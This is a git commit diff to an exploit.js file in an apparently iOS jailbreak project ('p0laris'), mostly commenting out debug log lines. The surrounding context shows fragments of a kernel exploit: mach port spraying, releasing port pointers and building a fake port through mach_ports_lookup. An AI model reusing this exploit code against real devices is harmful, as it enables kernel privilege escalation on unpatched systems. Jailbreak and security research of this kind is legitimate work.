diff options
| author | spv420 <spv@spv.sh> | 2022-07-31 20:46:39 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-31 20:46:39 -0400 |
| commit | 30cbeaa4c3c2e07fbabbb231591f95b6a1724e64 (patch) | |
| tree | 41cbe61781129b7554b2355d362cd2889a578eda /src/stage4/kexp | |
| parent | c9bc2881919bfb193bb9b59320fd77734f624566 (diff) | |
lol
Diffstat (limited to 'src/stage4/kexp')
| -rwxr-xr-x | src/stage4/kexp/exploit.js | 26 |
1 files changed, 13 insertions, 13 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js index 741f217..e761184 100755 --- a/src/stage4/kexp/exploit.js +++ b/src/stage4/kexp/exploit.js @@ -360,22 +360,22 @@ function r3gister(task, init_port_set, real_count, fake_count) { } function mach_ports_lookup_shit() { - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); var arrz = shit_heap(4); - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); write_u32(arrz, 0); - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); var sz = shit_heap(4);; - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); write_u32(sz, 3); - p0laris_log("fuck\n"); +// p0laris_log("fuck\n"); // var mts = mach_task_self(); p0laris_log("fuck\n"); calls4arg("mach_ports_lookup", task_self, arrz, sz, 0); - puts("helo"); - p0laris_log("mpl success\n"); - p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); - p0laris_log("mpl success\n"); +// puts("helo"); +// p0laris_log("mpl success\n"); +// p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); +// p0laris_log("mpl success\n"); return read_u32(read_u32(arrz) + 8); // return 0x42603; @@ -460,7 +460,7 @@ again: while (true) { // for (var i = 0; i < 8; i++) { var dummy = shit_heap(4); if (i % 4 == 0) { - p0laris_log("spray_ports %d\n", i); +// p0laris_log("spray_ports %d\n", i); } write_u32(fp + (i << 2), spray_ports(1)); spray(small_buf, read_u32(small_size), dummy); @@ -470,7 +470,7 @@ again: while (true) { for (var i = 0; i < PORTS_NUM; i++) { // for (var i = 0; i < 8; i++) { if (i % 4 == 0) { - p0laris_log("release_port_ptrs %d\n", i); +// p0laris_log("release_port_ptrs %d\n", i); } release_port_ptrs(read_u32(fp + (i << 2))); } @@ -487,13 +487,13 @@ again: while (true) { write_u32(sz, 3); // mach_ports_lookup_shit_dealloc(); var ret__ = r3gister(mach_task_self(), arrz, 2, 3); + p0laris_log("%d %s\n", ret__, mach_error_string(ret__)); + p0laris_log("r3gister done\n"); mach_ports_lookup(mach_task_self(), arrz, sz); p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); p0laris_log("mpl success\n"); var fake_port = read_u32(read_u32(arrz) + 8); - p0laris_log("%d %s\n", ret__, mach_error_string(ret__)); - p0laris_log("r3gister done\n"); // while (true) { // // } |